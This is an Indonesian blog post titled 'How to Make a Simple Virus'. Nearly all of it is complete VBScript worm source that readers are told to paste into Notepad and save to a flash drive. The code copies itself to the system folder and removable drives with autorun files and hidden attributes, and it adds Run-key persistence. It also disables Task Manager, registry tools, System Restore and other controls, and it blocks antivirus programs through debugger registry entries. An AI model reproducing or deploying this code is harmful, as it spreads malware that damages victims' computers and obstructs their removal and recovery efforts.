Saturday, July 31, 2010

Cara Membuat Virus Sederhana


Bagi anda yang ingin coba coba membuat virus , nih saya berikan contoh membuat virus sederhana dengan notepad. Coba Perhatikan Kode di bawah ini :





on error resume next
dim rekur,syspath,windowpath,desades,shadow2,mf,isi,isi2,tf,shadow1,nt,check,sd

isi = "[autorun]" & vbcrlf & "shellexecute=SD™.bat"
isi2 = "blog gecok" & vbcrlf & "gecok blog" & vbcrlf & "blog gecok..." & vbcrlf & "Angga sayang fina"
isi3 = "@echo off" & vbcrlf & "start SD™_(Angga dan Fina).sys.vbs" & vbcrlf & "start SD™_(Fina dan Angga).rtf" & vbcrlf & "@echo on"
set shadow2 = createobject("Scripting.FileSystemObject")
set mf = shadow2.getfile(wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Set windowpath = shadow2.getspecialfolder(0)
Set syspath = shadow2.getspecialfolder(1)
set tf = shadow2.getfile(syspath & "\windows.sys.vbs")
tf.attributes = 32
set tf = shadow2.createtextfile(syspath & "\windows.sys.vbs",2,true)
tf.write rekur
tf.close
set tf = shadow2.getfile(syspath & "\windows.sys.vbs")
tf.attributes = 39

Set windowpath = shadow2.getspecialfolder(0)
Set syspath = shadow2.getspecialfolder(1)
set tf = shadow2.getfile(syspath & "\SD2.rtf")
tf.attributes = 32
set tf = shadow2.createtextfile(syspath & "\SD2.rtf",2,true)
tf.write isi2
tf.close
set tf = shadow2.getfile(syspath & "\SD2.rtf")
tf.attributes = 39


for each desades in shadow2.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then

set tf=shadow2.getfile(desades.path &"\SD™_(Fina dan Angga).sys.vbs")
tf.attributes =32
set tf=shadow2.createtextfile(desades.path &"\SD™_(




























Fina dan Angga
















).sys.vbs",2,true)
tf.write rekur
tf.close
set tf=shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).sys.vbs")
tf.attributes = 39

set tf =shadow2.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=shadow2.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = shadow2.getfile(desades.path &"\autorun.inf")
tf.attributes=39

set tf=shadow2.getfile(desades.path &"\SD™.bat")
tf.attributes =32
set tf=shadow2.createtextfile(desades.path &"\SD™.bat",2,true)
tf.write isi3
tf.close
set tf=shadow2.getfile(desades.path &"\SD™.bat")
tf.attributes = 39

set tf =shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).rtf")
set tf=shadow2.createtextfile(desades.path &"\SD™_(



























Fina dan Angga
















).rtf",2,true)
tf.write isi2
tf.close
set tf = shadow2.getfile(desades.path &"\SD™_(




























Fina dan Angga
















).rtf")
end if
next

set shadow1 = createobject("WScript.Shell")

shadow1.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: SD For EVER!!! ::"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a", "angga dan fina"
shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList", "a"

shadow1.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "angga dan fina"
shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "angga dan fina selamanya. . ."

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SD2", syspath & "\SD2.rtf"
shadow1.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SD1", syspath & "\windows.sys.vbs"
shadow1.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.facebook.com/home.php?#!/profile.php?id=100000330196652"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel", "1", "REG_DWORD"

shadow1.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"



shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wordpad.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VB6.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ansav.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremoval.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\viremover.exe\Debugger",""

shadow1.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Smadav.exe\Debugger",""


if check <> 1 then
Wscript.sleep 20
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


































Copy Lalu pastekan ke dalam notepad anda, lalu save yang ingin di berikan virus. Contoh nya save as pada flashdisk anda. Jangan lupa aktifkan antivirus sebelum anda mempraktekannya.
Script ini sengaja tidak di berikan autorun , tanya kenapa ? di jawab kenapa.hehe
Baca juga ini.

0 comments:

Post a Comment